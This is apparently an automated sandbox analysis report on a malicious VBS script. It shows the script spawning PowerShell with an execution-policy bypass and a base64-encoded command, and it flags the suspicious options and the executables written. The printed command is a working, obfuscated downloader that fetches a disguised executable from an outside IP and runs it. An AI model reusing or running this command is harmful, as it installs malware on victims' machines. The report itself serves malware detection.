AGUAIAAgACAAIAAgACAAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0gIAAJAAkACQAJAAkACQAJAAkACQAJAAkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABzAFQAYQByAHQAIAAgACAAIAAgACAAHSAkAGUAbgB2ADoAVABlAG0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0g "
parent_process	wscript.exe	martian_process	C:\Windows\System32\winDOWsPoWersheLL\v1.0\poWeRshElL.exe "PowErShell -ex BypAsS -nop -W 1 -ec IAAJAAkAIAAJAAkAIABbAG4ARQB0AC4AcwBlAFIAdgBpAEMAZQBwAE8AaQBuAFQAbQBhAG4AQQBHAGUAUgBdADoAOgBTAGUAQwBVAHIASQB0AFkAUAByAG8AdABPAGMATwBsACAACQAJAAkACQAJAAkACQAJAAkACQAJAD0AIAAgACAAIAAgACAAIAAgAFsATgBlAHQALgBzAGUAYwBVAFIAaQB0AHkAcABSAE8AVABPAEMAbwBMAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAJACAACQAgAAkACQAJAAkAIAAgAAkAIAAJAAkAIABXAGcAZQBUACAAIAAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAOAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAGgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABhAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANgA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADQAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADgAMwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAyACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADIAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAE8AVQB0AGYAaQBsAGUAIAAgACAAIAAgACAAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0gIAAJAAkACQAJAAkACQAJAAkACQAJAAkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABzAFQAYQByAHQAIAAgACAAIAAgACAAHSAkAGUAbgB2ADoAVABlAG0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0g "

Creates a suspicious Powershell process (6 events)

option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\winDOWsPoWersheLL\v1.0\poWeRshElL.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

x.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All